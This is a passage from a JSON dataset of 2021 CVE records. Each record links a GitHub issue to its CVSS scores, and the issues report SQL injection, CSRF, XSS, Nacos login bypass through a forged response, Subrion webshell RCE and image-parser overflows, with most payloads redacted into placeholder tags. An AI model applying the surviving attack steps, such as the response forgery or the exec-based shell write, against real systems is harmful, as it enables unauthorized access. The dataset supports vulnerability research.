  72795. "description": "In stb_image's PNM reader, loading a specially constructed valid NUMBERTAG bit PGM file with NUMBERTAG channels can cause a crash due to an out of bounds read. Summary stb_image's PNM loader in version NUMBERTAG incorrectly interpreted NUMBERTAG bit PGM files as NUMBERTAG bit when converting to RGBA, leading to buffer overflow when later reinterpreting the result as a NUMBERTAG bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to NUMBERTAG bytes of non consecutive heap data without control over the read location. CVE number: CVETAG URLTAG Describe the bug In stb_image's PNM reader, loading a valid NUMBERTAG bit PGM file that is large enough with the number of components set to NUMBERTAG can cause a crash in APITAG due to an out of bounds read. This issue includes a fix in pull request NUMBERTAG and a proof of concept file that can be used to reproduce the crash. We're reporting this on APITAG Issues following the guidance in issue NUMBERTAG This appears to be due to how when APITAG loads a NUMBERTAG bit PGM file with N bytes of data, it incorrectly calls APITAG instead of APITAG , returning a buffer that is NUMBERTAG N bytes long instead of NUMBERTAG N bytes. Since APITAG is still NUMBERTAG when control returns to APITAG , APITAG attempts to read APITAG bytes of data from this buffer, resulting in out of bounds reads. When N is large enough, this results in an access violation. To Reproduce This .zip contains a NUMBERTAG KB .pgm file, APITAG which reproduces this issue: FILETAG Calling APITAG with a path to this file and with a req_comp of NUMBERTAG produces a crash. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version NUMBERTAG H2 with Microsoft Visual Studio NUMBERTAG and I expect it should reproduce on other systems as well. 
This file was generated using the following Python script, and should be a valid PGM file: APITAG It was derived from an example found using the Radamsa fuzzer URLTAG . Interestingly, PATHTAG is also a NUMBERTAG bit PGM file, but reading it doesn't cause a crash! I believe the reason is because this is a NUMBERTAG image, so it only includes N NUMBERTAG bytes of image data, and as a result the out of bounds reads don't cross a page boundary that would result in an access violation. Expected behavior The example file should be loaded without crashing. Screenshots Here's a screenshot showing where the crash occurs and the call stack, when run with the example file in image_test.c. APITAG that the call in image_test.c may be off by NUMBERTAG lines; the specific callsite is APITAG .) FILETAG Thanks!",
  72796. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  72797. "severity": "HIGH",
  72798. "baseScore": 7.1,
  72799. "impactScore": 5.2,
  72800. "exploitabilityScore": 1.8
  72801. },
  72802. {
  72803. "CVE_ID": "CVE-2021-42870",
  72804. "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/158",
  72805. "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/158",
  72806. "Repo_new": "xebd/accel-ppp",
  72807. "Issue_Created_At": "2021-10-18T14:22:42Z",
  72808. "description": "Abnormal packet sequence can cause stack buffer underflow. Using version APITAG . Summary Sending PPTP Call Clear Request Packet after PPTP Start Control Connection Request and PPTP Outgoing Call Request to server can cause ERRORTAG . APITAG Here is the detailed information of sent packets: Packet NUMBERTAG CODETAG Packet NUMBERTAG CODETAG Packet NUMBERTAG CODETAG Hint: the APITAG field is randomly generated thus directly forwarding those three packets might not reproduce the scene. To reproduce it, it's neccessary to construct similar packets. Crash report log of server: ERRORTAG Here is the asan report: ERRORTAG Reproduce info Build APITAG : CODETAG Run APITAG , use the following command: APITAG The running configuration APITAG is: ERRORTAG",
  72809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72810. "severity": "HIGH",
  72811. "baseScore": 7.5,
  72812. "impactScore": 3.6,
  72813. "exploitabilityScore": 3.9
  72814. },
  72815. {
  72816. "CVE_ID": "CVE-2021-42970",
  72817. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/8",
  72818. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/8",
  72819. "Repo_new": "cbkhwx/cxuucmsv3",
  72820. "Issue_Created_At": "2021-10-24T02:33:04Z",
  72821. "description": "A xss vulnerability was discovered in cxuucms NUMBERTAG There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl of PATHTAG parameter :content POC APITAG APITAG Then view the webpage named test xss in admin feedback list page , XSS vulnerability is triggered successfully. APITAG",
  72822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72823. "severity": "MEDIUM",
  72824. "baseScore": 6.1,
  72825. "impactScore": 2.7,
  72826. "exploitabilityScore": 2.8
  72827. },
  72828. {
  72829. "CVE_ID": "CVE-2021-43116",
  72830. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7182",
  72831. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7182",
  72832. "Repo_new": "alibaba/nacos",
  72833. "Issue_Created_At": "2021-11-05T07:48:43Z",
  72834. "description": "Found a login background vulnerability. The steps to APITAG FILETAG APITAG the latest version of APITAG URLTAG APITAG the steps for installation APITAG the installation is successful, access the default login page FILETAG APITAG any account and password Click login and the login failed FILETAG APITAG at login time FILETAG Intercepting return packet FILETAG The intercepted return packet is FILETAG APITAG returns the package and lets it pass FILETAG The packet is: HTTP NUMBERTAG Server: APITAG Date: Sun NUMBERTAG Apr NUMBERTAG GMT Content Type: application/json;charset=UTF NUMBERTAG Connection: close Vary: Origin Vary: Access Control Request Method Vary: Access Control Request Headers Access Control Allow Origin: URLTAG Access Control Allow Credentials: true Authorization: Bearer APITAG Content Length NUMBERTAG APITAG NUMBERTAG At this point you can see that you have successfully entered the background FILETAG The reason for this problem is that NACOS uses the default JWT key",
  72835. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  72836. "severity": "HIGH",
  72837. "baseScore": 8.8,
  72838. "impactScore": 5.9,
  72839. "exploitabilityScore": 2.8
  72840. },
  72841. {
  72842. "CVE_ID": "CVE-2021-43116",
  72843. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7127",
  72844. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7127",
  72845. "Repo_new": "alibaba/nacos",
  72846. "Issue_Created_At": "2021-10-26T10:13:19Z",
  72847. "description": "A vulnerability was found that could cause any existing user to log in. APITAG Describe the bug A clear and concise description of what the bug is. A vulnerability was found that could cause any existing user to log in Expected behavior A clear and concise description of what you expected to happen. Acutally behavior A clear and concise description of what you actually to happen. How to Reproduce Steps to reproduce the behavior NUMBERTAG Download the latest version of APITAG NUMBERTAG Access prompt page FILETAG NUMBERTAG Enter any user name and APITAG login to capture packets Change the returned package to the following FILETAG FILETAG HTTP NUMBERTAG Server: APITAG Date: Sun NUMBERTAG Apr NUMBERTAG GMT Content Type: application/json;charset=UTF NUMBERTAG Connection: close Vary: Origin Vary: Access Control Request Method Vary: Access Control Request Headers Access Control Allow Origin: URLTAG Access Control Allow Credentials: true Authorization: Bearer APITAG Content Length NUMBERTAG APITAG NUMBERTAG We can see the successful login FILETAG Desktop (please complete the following information): OS: [e.g. Centos] Version APITAG Module [e.g. naming/config] SDK [e.g. original, spring cloud alibaba nacos, dubbo] Additional context Add any other context about the problem here.",
  72848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  72849. "severity": "HIGH",
  72850. "baseScore": 8.8,
  72851. "impactScore": 5.9,
  72852. "exploitabilityScore": 2.8
  72853. },
  72854. {
  72855. "CVE_ID": "CVE-2021-43155",
  72856. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18",
  72857. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18",
  72858. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  72859. "Issue_Created_At": "2021-10-30T12:45:40Z",
  72860. "description": "SQL Injection vulnerability via the \"bookisbn\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Proof of concept CODETAG Response in Burpsuite FILETAG View source code FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Remediation Please validate input of \" bookisbn \" parameter in APITAG",
  72861. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72862. "severity": "CRITICAL",
  72863. "baseScore": 9.8,
  72864. "impactScore": 5.9,
  72865. "exploitabilityScore": 3.9
  72866. },
  72867. {
  72868. "CVE_ID": "CVE-2021-43156",
  72869. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19",
  72870. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19",
  72871. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  72872. "Issue_Created_At": "2021-10-31T05:35:12Z",
  72873. "description": "CSRF vulnerability in FILETAG allows a remote attacker to delete any book. Author APITAG ( APITAG Version NUMBERTAG Details The GET request for deleting a book with APITAG looks like this: APITAG Changing the value of the bookisbn parameter under admin privilege will delete the book with that ISBN. A remote attacker can embed the request into an innocent looking hyperlink: APITAG Step to reproduce NUMBERTAG First, create a malicious HTML page then host a website containing that page. APITAG CODETAG NUMBERTAG Entice the admin to click on the link to the malicious site. When the admin browses to that site, the link would be automatically clicked via APITAG and the book will be deleted. Response in Burpsuite FILETAG FILETAG Source code review FILETAG FILETAG Remediation Implement an Anti CSRF Token.",
  72874. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  72875. "severity": "MEDIUM",
  72876. "baseScore": 6.5,
  72877. "impactScore": 3.6,
  72878. "exploitabilityScore": 2.8
  72879. },
  72880. {
  72881. "CVE_ID": "CVE-2021-43157",
  72882. "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1",
  72883. "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1",
  72884. "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
  72885. "Issue_Created_At": "2021-10-31T12:18:55Z",
  72886. "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG A customer login to the store (to be able to access Cart page NUMBERTAG Add any product to cart NUMBERTAG Go to Cart page NUMBERTAG Click on \" Remove \" button to remove a product NUMBERTAG Intercept the request and insert the payload in the value of the id parameter. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG Remediation Validate input of id parameter in APITAG .",
  72887. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72888. "severity": "CRITICAL",
  72889. "baseScore": 9.8,
  72890. "impactScore": 5.9,
  72891. "exploitabilityScore": 3.9
  72892. },
  72893. {
  72894. "CVE_ID": "CVE-2021-43158",
  72895. "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2",
  72896. "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2",
  72897. "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
  72898. "Issue_Created_At": "2021-10-31T12:31:11Z",
  72899. "description": "CSRF vulnerability in FILETAG allows a remote attacker to remove any product in the customer's cart. Author APITAG ( APITAG Version NUMBERTAG Details The GET request for removing a prodcut with APITAG looks like this: APITAG Changing the value of the id parameter in the customer session will remove the product with that ID. A remote attacker can embed the request into an innocent looking hyperlink: APITAG Step to reproduce NUMBERTAG First, create a malicious HTML page then host a website containing that page. APITAG CODETAG NUMBERTAG Entice the customer to click on the link to the malicious site. When the customer browses to that site, the link would be automatically clicked via APITAG and the product will be removed. Response in Burpsuite FILETAG FILETAG Source code review FILETAG FILETAG Remediation Implement an Anti CSRF Token.",
  72900. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  72901. "severity": "MEDIUM",
  72902. "baseScore": 4.3,
  72903. "impactScore": 1.4,
  72904. "exploitabilityScore": 2.8
  72905. },
  72906. {
  72907. "CVE_ID": "CVE-2021-43177",
  72908. "Issue_Url_old": "https://github.com/tinfoil/devise-two-factor/issues/106",
  72909. "Issue_Url_new": "https://github.com/tinfoil/devise-two-factor/issues/106",
  72910. "Repo_new": "tinfoil/devise-two-factor",
  72911. "Issue_Created_At": "2017-03-07T21:58:24Z",
  72912. "description": "A consumed otp becomes valid again within the drift period. If an otp is consumed, it becomes invalid during the APITAG of the instantiated APITAG object in APITAG APITAG is currently always NUMBERTAG seconds, since that is the default: URLTAG However, during the drift period specified by APITAG , the otp again becomes valid. I believe this is unexpected behavior, and the intention is for an otp to not be reusable within the drift period after it has been consumed. Here are some specs dropped in here URLTAG which currently fail: CODETAG",
  72913. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  72914. "severity": "MEDIUM",
  72915. "baseScore": 5.3,
  72916. "impactScore": 3.6,
  72917. "exploitabilityScore": 1.6
  72918. },
  72919. {
  72920. "CVE_ID": "CVE-2021-43298",
  72921. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/304",
  72922. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/304",
  72923. "Repo_new": "embedthis/goahead",
  72924. "Issue_Created_At": "2021-08-10T02:59:10Z",
  72925. "description": "Constant time password comparisons. Summary The password comparison routine employed in versions up to NUMBERTAG used a fail fast comparison which assist brute force password attacks. Detail The APITAG routine used the smatch routine which uses sncmp. This routine would fail as soon as a mismatch was detected. This fail fast behavior may provide information to remove brute force attacks and guide attackers into better password guesses by helping them focus their attacks. Threat Scope and Mitigation The attacker would need persistent access to a high speed network to perform the attack. If the password length is long, the threat level is lower, but a short password could be more vulnerable. Remedy Deploy APITAG NUMBERTAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  72926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72927. "severity": "CRITICAL",
  72928. "baseScore": 9.8,
  72929. "impactScore": 5.9,
  72930. "exploitabilityScore": 3.9
  72931. },
  72932. {
  72933. "CVE_ID": "CVE-2021-43421",
  72934. "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3429",
  72935. "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3429",
  72936. "Repo_new": "studio-42/elfinder",
  72937. "Issue_Created_At": "2021-11-01T11:06:24Z",
  72938. "description": "RCE APITAG NUMBERTAG Describe the bug bypass ext check Steps to reproduce the behavior NUMBERTAG create a .php file using the following URL: URLTAG APITAG file : URLTAG APITAG PHP code in FILETAG URLTAG echo APITAG p (please complete the following information): OS: Windows XAMPP",
  72939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72940. "severity": "CRITICAL",
  72941. "baseScore": 9.8,
  72942. "impactScore": 5.9,
  72943. "exploitabilityScore": 3.9
  72944. },
  72945. {
  72946. "CVE_ID": "CVE-2021-43429",
  72947. "Issue_Url_old": "https://github.com/Seagate/cortx-s3server/issues/1037",
  72948. "Issue_Url_new": "https://github.com/seagate/cortx-s3server/issues/1037",
  72949. "Repo_new": "seagate/cortx-s3server",
  72950. "Issue_Created_At": "2021-07-18T08:19:31Z",
  72951. "description": "Potential error due to the unreleased lock . Dear developers: Thank you for your checking. In the method APITAG , the lock APITAG may be not released if the branch condition satisfies and the method returns. URLTAG URLTAG CODETAG Best,",
  72952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72953. "severity": "HIGH",
  72954. "baseScore": 7.5,
  72955. "impactScore": 3.6,
  72956. "exploitabilityScore": 3.9
  72957. },
  72958. {
  72959. "CVE_ID": "CVE-2021-43453",
  72960. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4754",
  72961. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4754",
  72962. "Repo_new": "jerryscript-project/jerryscript",
  72963. "Issue_Created_At": "2021-08-28T22:00:46Z",
  72964. "description": "Heap overflow on an ill formed JS program. APITAG revision APITAG Build platform ERRORTAG Build steps APITAG Test case There are two test cases, where APITAG can trigger a direct crash of the clean built jerry and APITAG can trigger a heap overflow of the ASAN enabled built jerry. This bug is found by a naive fuzzer. And I use APITAG to reduce the test cases. I sincerely apologize for making them struggling. + FILETAG ERRORTAG + FILETAG ERRORTAG Execution steps APITAG ERRORTAG Output See above. Backtrace See above. Expected behavior Not to crash",
  72965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72966. "severity": "CRITICAL",
  72967. "baseScore": 9.8,
  72968. "impactScore": 5.9,
  72969. "exploitabilityScore": 3.9
  72970. },
  72971. {
  72972. "CVE_ID": "CVE-2021-43464",
  72973. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/888",
  72974. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/888",
  72975. "Repo_new": "intelliants/subrion",
  72976. "Issue_Created_At": "2021-11-03T02:21:06Z",
  72977. "description": "There is a remote command execution vulnerability. Remote code execution vulnerabilities in the background Affected version subrion NUMBERTAG lates login address URLTAG Find Fields after login FILETAG On the right are the operations related to the column, choose one here, select Facebook FILETAG open Required field FILETAG Validation PHP code can enter any php code, here is a sentence of Trojan exec('echo ^ APITAG PATHTAG );exec('echo APITAG Off ^ APITAG PATHTAG ); Then go to APITAG to trigger it FILETAG At this time, you can access the shell and execute any command FILETAG principle The reason is that the code at the background Fields will be written to the database FILETAG Then when the information is modified, the data in it will be executed through APITAG FILETAG Proposed changes The incoming Validation PHP code adds filtering for sensitive functions, such as APITAG , APITAG , etc.",
  72978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  72979. "severity": "HIGH",
  72980. "baseScore": 8.8,
  72981. "impactScore": 5.9,
  72982. "exploitabilityScore": 2.8
  72983. },
  72984. {
  72985. "CVE_ID": "CVE-2021-43478",
  72986. "Issue_Url_old": "https://github.com/kr0za/bugs/issues/1",
  72987. "Issue_Url_new": "https://github.com/kr0za/bugs/issues/1",
  72988. "Repo_new": "kr0za/bugs",
  72989. "Issue_Created_At": "2021-11-03T14:09:05Z",
  72990. "description": "install bug. In FILETAG , it is not checked whether FILETAG already exists in the website root directory. The install directory is not automatically deleted after the system installation. When you visit /install again, reinstall the website again. APITAG Installation succeeded APITAG The install directory is not automatically deleted after the system is installed,visit /install again APITAG The website was reinstalled APITAG",
  72991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
  72992. "severity": "MEDIUM",
  72993. "baseScore": 5.4,
  72994. "impactScore": 2.5,
  72995. "exploitabilityScore": 2.8
  72996. },
  72997. {
  72998. "CVE_ID": "CVE-2021-43479",
  72999. "Issue_Url_old": "https://github.com/mikaelstaer/The-Secretary/issues/10",
  73000. "Issue_Url_new": "https://github.com/mikaelstaer/the-secretary/issues/10",
  73001. "Repo_new": "mikaelstaer/the-secretary",
  73002. "Issue_Created_At": "2021-11-04T08:53:43Z",
  73003. "description": "install rce. my env\uff1a Version NUMBERTAG php NUMBERTAG windows At APITAG input was saved to PATHTAG causing RCE APITAG APITAG Create a new database named APITAG and then visit FILETAG to install the website APITAG Then visit PATHTAG APITAG",
  73004. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73005. "severity": "CRITICAL",
  73006. "baseScore": 9.8,
  73007. "impactScore": 5.9,
  73008. "exploitabilityScore": 3.9
  73009. },
  73010. {
  73011. "CVE_ID": "CVE-2021-43492",
  73012. "Issue_Url_old": "https://github.com/AlquistManager/alquist/issues/42",
  73013. "Issue_Url_new": "https://github.com/alquistmanager/alquist/issues/42",
  73014. "Repo_new": "alquistmanager/alquist",
  73015. "Issue_Created_At": "2021-09-22T20:04:48Z",
  73016. "description": "FILETAG",
  73017. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73018. "severity": "HIGH",
  73019. "baseScore": 7.5,
  73020. "impactScore": 3.6,
  73021. "exploitabilityScore": 3.9
  73022. },
  73023. {
  73024. "CVE_ID": "CVE-2021-43493",
  73025. "Issue_Url_old": "https://github.com/cksgf/ServerManagement/issues/21",
  73026. "Issue_Url_new": "https://github.com/cksgf/servermanagement/issues/21",
  73027. "Repo_new": "cksgf/servermanagement",
  73028. "Issue_Created_At": "2021-09-22T23:11:43Z",
  73029. "description": "FILETAG",
  73030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73031. "severity": "HIGH",
  73032. "baseScore": 7.5,
  73033. "impactScore": 3.6,
  73034. "exploitabilityScore": 3.9
  73035. },
  73036. {
  73037. "CVE_ID": "CVE-2021-43494",
  73038. "Issue_Url_old": "https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2",
  73039. "Issue_Url_new": "https://github.com/codingforentrepreneurs/opencv-rest-api/issues/2",
  73040. "Repo_new": "codingforentrepreneurs/opencv-rest-api",
  73041. "Issue_Created_At": "2021-09-22T22:50:48Z",
  73042. "description": "FILETAG",
  73043. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73044. "severity": "HIGH",
  73045. "baseScore": 7.5,
  73046. "impactScore": 3.6,
  73047. "exploitabilityScore": 3.9
  73048. },
  73049. {
  73050. "CVE_ID": "CVE-2021-43495",
  73051. "Issue_Url_old": "https://github.com/AlquistManager/alquist/issues/43",
  73052. "Issue_Url_new": "https://github.com/alquistmanager/alquist/issues/43",
  73053. "Repo_new": "alquistmanager/alquist",
  73054. "Issue_Created_At": "2021-09-22T22:32:57Z",
  73055. "description": "FILETAG",
  73056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73057. "severity": "HIGH",
  73058. "baseScore": 7.5,
  73059. "impactScore": 3.6,
  73060. "exploitabilityScore": 3.9
  73061. },
  73062. {
  73063. "CVE_ID": "CVE-2021-43496",
  73064. "Issue_Url_old": "https://github.com/varun-suresh/Clustering/issues/12",
  73065. "Issue_Url_new": "https://github.com/varun-suresh/clustering/issues/12",
  73066. "Repo_new": "varun-suresh/clustering",
  73067. "Issue_Created_At": "2021-09-22T22:24:23Z",
  73068. "description": "FILETAG",
  73069. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73070. "severity": "HIGH",
  73071. "baseScore": 7.5,
  73072. "impactScore": 3.6,
  73073. "exploitabilityScore": 3.9
  73074. },
  73075. {
  73076. "CVE_ID": "CVE-2021-43521",
  73077. "Issue_Url_old": "https://github.com/HardySimpson/zlog/issues/206",
  73078. "Issue_Url_new": "https://github.com/hardysimpson/zlog/issues/206",
  73079. "Repo_new": "hardysimpson/zlog",
  73080. "Issue_Created_At": "2021-11-03T09:30:35Z",
  73081. "description": "stack buffer overflow at zlog_conf_build_with_file . Hi, I found a stack buffer overflow at zlog_conf_build_with_file PATHTAG Here is the stack backtrace: ERRORTAG Of course , I byte read overflow is not important. But you can see, \"p\" It will read the memory that is underflow the \"line\" buffer. If there is exactly NUMBERTAG or NUMBERTAG or anthiny that means \"space\", \"p\" will go on move and the next \"p++\" will cause a write overflow. That is really a bug. Sepecally, I think the byte read overflow is like an address. So , there will be a crash or other wired things. If I'm right? If you need the crash case you can tell me.",
  73082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73083. "severity": "HIGH",
  73084. "baseScore": 7.5,
  73085. "impactScore": 3.6,
  73086. "exploitabilityScore": 3.9
  73087. },
  73088. {
  73089. "CVE_ID": "CVE-2021-43579",
  73090. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/453",
  73091. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/453",
  73092. "Repo_new": "michaelrsweet/htmldoc",
  73093. "Issue_Created_At": "2021-11-04T15:10:19Z",
  73094. "description": "Stack buffer overflow in APITAG In APITAG , the APITAG variable is read from the BMP file header and directly used to read into a fixed size buffer. CODETAG A maliciously crafted BMP file could set the APITAG variable to a number big enough to overflow the stack and thus the return address. I am attaching a proof of concept below. It can be tested with: APITAG FILETAG",
  73095. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73096. "severity": "HIGH",
  73097. "baseScore": 7.8,
  73098. "impactScore": 5.9,
  73099. "exploitabilityScore": 1.8
  73100. },
  73101. {
  73102. "CVE_ID": "CVE-2021-43579",
  73103. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/456",
  73104. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/456",
  73105. "Repo_new": "michaelrsweet/htmldoc",
  73106. "Issue_Created_At": "2021-12-11T09:15:18Z",
  73107. "description": "Stack Buffer Overflow with BMP files Version NUMBERTAG The fix for the issue FILETAG does not completely protect against a stack buffer overflow in APITAG . It is possible to control the read in buffer colormap through the APITAG variable. The previous fix does not mitigate the issue as the APITAG is an integer , therefore, regardless of the ERRORTAG return of APITAG the buffer can be overflowed. CODETAG As an example, if APITAG is APITAG the if statement validates the variable and leads to a buffer overflow. Impact This buffer overflow can lead to modifying the instruction pointer and can therefore lead to remote code execution. FILETAG POC: FILETAG",
  73108. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73109. "severity": "HIGH",
  73110. "baseScore": 7.8,
  73111. "impactScore": 5.9,
  73112. "exploitabilityScore": 1.8
  73113. },
  73114. {
  73115. "CVE_ID": "CVE-2021-43616",
  73116. "Issue_Url_old": "https://github.com/npm/cli/issues/2701",
  73117. "Issue_Url_new": "https://github.com/npm/cli/issues/2701",
  73118. "Repo_new": "npm/cli",
  73119. "Issue_Created_At": "2021-02-15T03:57:16Z",
  73120. "description": "[BUG] npm ci succeeds when APITAG doesn't match APITAG . Current Behavior: npm ci does not fail when APITAG doesn't match APITAG Expected Behavior: npm ci refuses to install when the lock file is invalid. Steps To Reproduce NUMBERTAG Manually bump a major version of a dependency in APITAG NUMBERTAG Run npm ci NUMBERTAG It should fail but performs the whole installation npm MENTIONTAG APITAG npm MENTIONTAG APITAG Environment: OS: Mac OS Node NUMBERTAG npm NUMBERTAG",
  73121. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73122. "severity": "CRITICAL",
  73123. "baseScore": 9.8,
  73124. "impactScore": 5.9,
  73125. "exploitabilityScore": 3.9
  73126. },
  73127. {
  73128. "CVE_ID": "CVE-2021-43620",
  73129. "Issue_Url_old": "https://github.com/nvzqz/fruity/issues/14",
  73130. "Issue_Url_new": "https://github.com/nvzqz/fruity/issues/14",
  73131. "Repo_new": "nvzqz/fruity",
  73132. "Issue_Created_At": "2021-10-31T23:36:20Z",
  73133. "description": "Display for APITAG truncates at null bytes. This issue was originally reported privately, but I thought I should create an issue to inform others about it, as it has not yet been fixed. The implementation of FILETAG for FILETAG truncates at null bytes, since it uses APITAG URLTAG . It should be possible to use APITAG URLTAG and APITAG URLTAG instead to create the complete string. Example: APITAG That example only prints the string \"null\". Since APITAG URLTAG uses FILETAG to create strings, it has the same issue. APITAG URLTAG and APITAG URLTAG also have the same issue. If you believe this is a valid issue, I encourage you to file a security advisory at URLTAG including a patch version if it is possible to release within two weeks. Thank you for your work on this crate. Creating a security advisory is not meant to be anything other than a way to provide information to other users.",
  73134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  73135. "severity": "HIGH",
  73136. "baseScore": 7.5,
  73137. "impactScore": 3.6,
  73138. "exploitabilityScore": 3.9
  73139. },
  73140. {
  73141. "CVE_ID": "CVE-2021-43628",
  73142. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2",
  73143. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2",
  73144. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73145. "Issue_Created_At": "2021-11-08T04:40:11Z",
  73146. "description": "SQL Injection vulnerability via the \"email\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Input username , password and choose Admin in the User Type NUMBERTAG Click on the Login button NUMBERTAG Intercept the request and insert the payload in the value of the email parameter. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG FILETAG Remediation Validate input of email parameter in APITAG .",
  73147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73148. "severity": "CRITICAL",
  73149. "baseScore": 9.8,
  73150. "impactScore": 5.9,
  73151. "exploitabilityScore": 3.9
  73152. },
  73153. {
  73154. "CVE_ID": "CVE-2021-43629",
  73155. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3",
  73156. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3",
  73157. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73158. "Issue_Created_At": "2021-11-08T09:53:16Z",
  73159. "description": "SQL Injection vulnerability via multiple parameters in FILETAG . Author APITAG ( APITAG Version NUMBERTAG ulnerable parameters Staff Registration: afullname aemail apassword Doctor Registration: dfullname demail dpassword APITAG Delete Clerks: APITAG Delete Doctor: APITAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Login with User Type = Admin NUMBERTAG Input personal information in the form NUMBERTAG Click on the Register button NUMBERTAG Intercept the request and insert the payload in the value of parameters. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG Register function URLTAG FILETAG Delete function URLTAG FILETAG Remediation Validate input of all vulnerable parameters in APITAG .",
